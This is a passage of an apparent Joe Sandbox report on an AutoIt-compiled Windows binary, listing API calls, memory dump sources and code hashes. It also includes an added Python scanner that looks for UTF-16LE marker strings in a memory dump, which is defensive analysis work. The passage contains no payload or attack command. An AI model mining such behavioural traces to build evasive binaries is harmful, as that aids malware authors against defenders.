                                                                                                    • Instruction ID: 3340f18894c7c6c457062ad94c6b2b9631d96c67e065db00f1dd8c4bb1dd3acb
                                                                                                    • Opcode Fuzzy Hash: 874911dec09df82e581f0019f0f253af2803cb218453ab0d66f3a57f1039db15
                                                                                                    • Instruction Fuzzy Hash: 8B113C75611608FFEB208FA4DC44EAF77B9EF14744F508469F809D7120E7B19E419760
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
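Two of the entries above show the strings this runtime hands to wide-character APIs: "AutoIt v3" and "edit" as the class/title arguments of CreateWindowExW, and "Control Panel\Mouse" with "SwapMouseButtons" as the key and value names reaching RegOpenKeyExW and RegQueryValueExW. Because those are the W variants, the strings live in the dump as UTF-16LE, and an ASCII grep for them misses exactly the form the runtime uses. The scanner below is an added example, not code from the Joe Sandbox report or from the AutoIt project: it searches a byte image for each marker in both encodings, reports offsets, and exposes only the wide hits as indicators. The image it scans is constructed inline (it is not a real dump), and the marker labels are the example's own.

```python
from dataclasses import dataclass
from typing import Dict, List

# Markers copied from this report's API arguments (wide-string parameters of
# CreateWindowExW / RegOpenKeyExW / RegQueryValueExW). The key names are this
# example's own labels, not identifiers from the report.
MARKERS: Dict[str, str] = {
    "autoit_window_class": "AutoIt v3",
    "mouse_swap_key": "Control Panel\\Mouse",
    "mouse_swap_value": "SwapMouseButtons",
}


@dataclass(frozen=True)
class Hit:
    marker: str
    encoding: str   # "utf-16-le" (what the W APIs consume) or "ascii"
    offset: int


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """Every offset at which needle occurs in buf, overlapping matches included."""
    offsets: List[int] = []
    start = 0
    while (i := buf.find(needle, start)) >= 0:
        offsets.append(i)
        start = i + 1
    return offsets


def scan_markers(buf: bytes, markers: Dict[str, str] = MARKERS) -> List[Hit]:
    """Search for each marker in both encodings; return hits sorted by offset."""
    hits: List[Hit] = []
    for name, text in markers.items():
        for enc in ("utf-16-le", "ascii"):
            for off in find_all(buf, text.encode(enc)):
                hits.append(Hit(name, enc, off))
    return sorted(hits, key=lambda h: (h.offset, h.encoding))


def wide_indicators(buf: bytes, markers: Dict[str, str] = MARKERS) -> Dict[str, List[int]]:
    """Marker -> offsets of UTF-16LE occurrences only. Narrow copies are left out
    because the calls in the report are W variants, which take UTF-16LE strings."""
    out: Dict[str, List[int]] = {}
    for h in scan_markers(buf, markers):
        if h.encoding == "utf-16-le":
            out.setdefault(h.marker, []).append(h.offset)
    return out


def build_sample_image() -> bytes:
    """Constructed test image, not a real dump: filler, the three markers stored as
    NUL-terminated UTF-16LE, and one narrow 'AutoIt v3' decoy at the end."""
    def wide(s: str) -> bytes:
        return s.encode("utf-16-le") + b"\x00\x00"

    return b"".join([
        b"\x00" * 16 + b"MZ" + b"\x90" * 40,   # 58 bytes of filler
        wide("AutoIt v3"),                      # offset 58, 20 bytes
        b"\x00" * 9,                            # padding
        wide("Control Panel\\Mouse"),           # offset 87, 40 bytes
        wide("SwapMouseButtons"),               # offset 127, 34 bytes
        b"AutoIt v3\x00",                       # narrow decoy at offset 161
    ])


if __name__ == "__main__":
    image = build_sample_image()
    for h in scan_markers(image):
        print(f"{h.offset:#06x}  {h.encoding:9}  {h.marker}")
    print("wide-only indicators:", wide_indicators(image))
```

Point scan_markers at the bytes of a .sdmp file listed under "Memory Dump Source" to get offsets you can turn into VAs by adding the dump's stated base. A narrow-only hit is worth listing but not counting: it is what you would see in an unrelated binary that merely mentions the string.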

                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,0020DC30), ref: 001DDABB
                                                                                                    • GetLastError.KERNEL32 ref: 001DDACA
                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 001DDAD9
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0020DC30), ref: 001DDB36
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2267087916-0
                                                                                                    • Opcode ID: c0ff3cbcdf4cc6e3aeecb7c3143d2c6655f2eb67311739c54b304d3fde82820e
                                                                                                    • Instruction ID: a534444521259539d648b9f889fc9548860cb9a66b2cd1120135aa2916079948
                                                                                                    • Opcode Fuzzy Hash: c0ff3cbcdf4cc6e3aeecb7c3143d2c6655f2eb67311739c54b304d3fde82820e
                                                                                                    • Instruction Fuzzy Hash: F0219F305093019FC710DF64E8859AAB7E4EE66368F544A1FF8A9833A2D730D94ACB42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 001B4115
                                                                                                      • Part of subcall function 0017557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00175558,?,?,001B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0017559E
                                                                                                      • Part of subcall function 001739DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001739FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                    • String ID: X$`u#
                                                                                                    • API String ID: 779396738-1508474015
                                                                                                    • Opcode ID: 4b4114866a281d1efecb858488b197380564d22625484bc684c83233f0238f13
                                                                                                    • Instruction ID: 503a126ee487f418532ec782e2b9aa132a75afff0e544c075ddb94f3b4dc7d8e
                                                                                                    • Opcode Fuzzy Hash: 4b4114866a281d1efecb858488b197380564d22625484bc684c83233f0238f13
                                                                                                    • Instruction Fuzzy Hash: 7221D5B1A102489BCF15DF98C809BEE7BFDAF58304F008059E509E7241DBF45A899FA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 001909F8
  • Part of subcall function 00193634: RaiseException.KERNEL32(?,?,?,00190A1A,?,00000000,?,?,?,?,?,?,00190A1A,00000000,00239758,00000000), ref: 00193694
• __CxxThrowException@8.LIBVCRUNTIME ref: 00190A15
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: 02d6d44d5031fa0bf21dab4d3217f88f4afcc24d0b3f7dd09945f9b3f159f9ee
• Instruction ID: 924aabf8cf55f1b61bd709088bf389a09347d3708aeb76a0e6a940b35ffed6d3
• Opcode Fuzzy Hash: 02d6d44d5031fa0bf21dab4d3217f88f4afcc24d0b3f7dd09945f9b3f159f9ee
• Instruction Fuzzy Hash: 3EF0F67490030DBBCF06BAB8EC4699EB7AC5E19314B604130B928924E3EB70EF96C5C0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001F8C52
• TerminateProcess.KERNEL32(00000000), ref: 001F8C59
• FreeLibrary.KERNEL32(?,?,?,?), ref: 001F8E3A
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• API String ID: 146820519-0
• Opcode ID: 7956376d858d353ea715dc1928c0c5520a014c2c62bdf1e9c1891372c6e2c852
• Instruction ID: c90fd80792726f620d2af3604a8961bd61c9e7b29c136ee7e390aaefde947ef6
• Opcode Fuzzy Hash: 7956376d858d353ea715dc1928c0c5520a014c2c62bdf1e9c1891372c6e2c852
• Instruction Fuzzy Hash: E5127C71A083449FC714DF28C484B6ABBE5FF98318F14895DE9898B292DB30ED45CF92
Uniqueness
• Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: _wcslen$_strcat
• String ID:
• API String ID: 306214811-0
• Opcode ID: 6750d31232a6a6b9d89c1647aa50e4114f8046847a7805262dd378b761c7adb8
• Instruction ID: a89e47276fe98e4f4ad0a77f854fed4d5b807246db34234502c006cf634e0ec5
• Opcode Fuzzy Hash: 6750d31232a6a6b9d89c1647aa50e4114f8046847a7805262dd378b761c7adb8
• Instruction Fuzzy Hash: D8A14C31604609DFCB18EF58C5D1A69B7B1FF55318B1084ADE94A8F792DB32ED42CB80
Uniqueness
• Uniqueness Score: -1.00%
APIs
• SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00176CA1
• SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00176CB1
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 64dc3285a5bf6dfaef2e33c7417e0b9c9bb36219f74d7b13ab39ba623eba8b95
• Instruction ID: 798347c3ac7fd27077b968dc7adcd8e656f277d3d270a79b491f88457b31a44b
• Opcode Fuzzy Hash: 64dc3285a5bf6dfaef2e33c7417e0b9c9bb36219f74d7b13ab39ba623eba8b95
• Instruction Fuzzy Hash: 81315B71A00A0AFFDB19CF68C980B99B7B5FB04314F14C629E919A7244D7B1FE94DB90
Uniqueness
• Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00175F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00176049
• KillTimer.USER32(?,00000001,?,?), ref: 0018FD44
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0018FD53
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001CFDD3
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
• Opcode ID: 25ed902f32c1b327927a15932ee17e495fcf827cce5a60430a8a49d24ab8e522
• Instruction ID: 167298baefee3b139a49b88528de5d8c8ad0fc75cd3ebfc9a91e9d486bedd368
• Opcode Fuzzy Hash: 25ed902f32c1b327927a15932ee17e495fcf827cce5a60430a8a49d24ab8e522
• Instruction Fuzzy Hash: 8D31D774904344AFEB32CF648889BE6BBED9F26708F0004AEE6DE57241C7745A86CB51
Uniqueness
• Uniqueness Score: -1.00%
APIs
• FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,001A895C,?,00239CE8,0000000C), ref: 001A8A94
• GetLastError.KERNEL32(?,001A895C,?,00239CE8,0000000C), ref: 001A8A9E
• __dosmaperr.LIBCMT ref: 001A8AC9
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: ChangeCloseErrorFindLastNotification__dosmaperr
• String ID:
• API String ID: 490808831-0
• Opcode ID: 7173f88615bc56e7e02717198201407e5387a1ab3de516506ad4581a85fe0d68
• Instruction ID: 4f1387f4c7068dd8c5deef923be06f887a51fc9fe4f308ace630faaf9f0dbd93
• Opcode Fuzzy Hash: 7173f88615bc56e7e02717198201407e5387a1ab3de516506ad4581a85fe0d68
• Instruction Fuzzy Hash: BF016F3B60526057D7142374688577E77464B93738F2A021AF80CDB0D2DF608CC58250
Uniqueness
• Uniqueness Score: -1.00%
APIs
• SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,001A97CA,FF8BC369,00000000,00000002,00000000), ref: 001A9754
• GetLastError.KERNEL32(?,001A97CA,FF8BC369,00000000,00000002,00000000,?,001A5EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00196F61), ref: 001A975E
• __dosmaperr.LIBCMT ref: 001A9765
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: 140cb4f9fa04cf2e50406da3974d9a9521fc036732c60d6c101250c26f920f8f
• Instruction ID: 064e35b627c92598a185b6f10ff0d4301a7b3c51de0667fb75b47b9e8a03be56
• Opcode Fuzzy Hash: 140cb4f9fa04cf2e50406da3974d9a9521fc036732c60d6c101250c26f920f8f
• Instruction Fuzzy Hash: F1014C3A620214ABCF059FE9EC45C6E7B2ADBC6330B240249F814DB191EB70DD81CFA0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 001AD1E4
• _free.LIBCMT ref: 001AD21D
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001AD224
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: EnvironmentStrings$Free_free
• String ID:
• API String ID: 2716640707-0
• Opcode ID: 4141b287abf37d31bc49480a7184cd29fb5e13116218e7f100a6542f24019c39
• Instruction ID: ab9b2a8cb89bfc11f7da975cc87979dde5386419740970cebd019d10b9439dfa
• Opcode Fuzzy Hash: 4141b287abf37d31bc49480a7184cd29fb5e13116218e7f100a6542f24019c39
• Instruction Fuzzy Hash: FCE0ED3B541A212AD22223397C8DA6F2A2CEFD37A0B260166F40982582EF208D0280F1
Uniqueness
• Uniqueness Score: -1.00%
                                                                                                    APIs
                                                                                                    • TranslateMessage.USER32(?), ref: 0017F22B
                                                                                                    • DispatchMessageW.USER32(?), ref: 0017F239
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017F24F
                                                                                                    • Sleep.KERNELBASE(0000000A), ref: 0017F261
                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 001C327C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3288985973-0
                                                                                                    • Opcode ID: 31d3ac16f1b7761ef42fb9ed164f32d6fd3bf4f946b52477356b7c7fe556f542
                                                                                                    • Instruction ID: 914acd1a3963d2dff360d3e2ae98845642ac8295f5388ec228c98a29db2eca3e
                                                                                                    • Opcode Fuzzy Hash: 31d3ac16f1b7761ef42fb9ed164f32d6fd3bf4f946b52477356b7c7fe556f542
                                                                                                    • Instruction Fuzzy Hash: 1EF03A305053419AEA348BA09C49F9AB3ADEB94300F408928F619830D0DB3095488B21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00182FB6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID: CALL
                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                    • Opcode ID: 8470a34b4feb4de0f2f202d80ab54ecb59af7674a7c59a6f60efaf65fdef61d4
                                                                                                    • Instruction ID: a7b0ac0f7d49d8b75500fc13aae6ba02c70e115dee326841e2d74d24b00eb058
                                                                                                    • Opcode Fuzzy Hash: 8470a34b4feb4de0f2f202d80ab54ecb59af7674a7c59a6f60efaf65fdef61d4
                                                                                                    • Instruction Fuzzy Hash: AA228B706082419FC715EF14C484B2ABBF1BFA9314F25895DF89A8B3A2D771EA41CF52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 52254354233bbb404ca8b5d6f7704f2e1daa6224225ba5af8b205ce6584fd908
                                                                                                    • Instruction ID: 0de06b6c9d36e33691fadbf5f7d2a7345d384cf34be5f3a760a3616a4755944f
                                                                                                    • Opcode Fuzzy Hash: 52254354233bbb404ca8b5d6f7704f2e1daa6224225ba5af8b205ce6584fd908
                                                                                                    • Instruction Fuzzy Hash: 3C32CD71A00205AFDB24EF54C881FAEB7B9EF24314F148529E856AB2A1D731EE45CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001733E9,00242418,?,?,?,?,?,?,?,001732EF,?), ref: 00174227
                                                                                                      • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FullNamePath_wcslen
                                                                                                    • String ID: $$
                                                                                                    • API String ID: 4019309064-702190059
                                                                                                    • Opcode ID: 316ee1aac97f1a85b1e1c508264a9a937cc9db6243c67ebc7f8b7b14875127e2
                                                                                                    • Instruction ID: c7ca6bf6617566fe5c4ed8629559ee6d00f0d289f56ef150e4ad4a29e5fc44d3
                                                                                                    • Opcode Fuzzy Hash: 316ee1aac97f1a85b1e1c508264a9a937cc9db6243c67ebc7f8b7b14875127e2
                                                                                                    • Instruction Fuzzy Hash: 1711A135610208DBCB05EBA4A805EDD77FCAF18350B0180A5F949D3292DFB0E7988B11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0017557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00175558,?,?,001B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0017559E
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 001E9665
                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001E9673
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringWrite$FullNamePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 3876400906-0
                                                                                                    • Opcode ID: 54c2287d89501b7409fb3ce8f28c0d78784f7b8bd4887b708b61926e31f8e5b9
                                                                                                    • Instruction ID: 958faf1a154dd47dc429672880fc5d17eb8985983b63522a7672f80d61712968
                                                                                                    • Opcode Fuzzy Hash: 54c2287d89501b7409fb3ce8f28c0d78784f7b8bd4887b708b61926e31f8e5b9
                                                                                                    • Instruction Fuzzy Hash: BF111979600A259FCB10EB65C884D6EB7F5FF58364B058848EC5AAB361DB30FD01CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00173B33,?,00008000), ref: 00176E80
                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00173B33,?,00008000), ref: 001B59A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
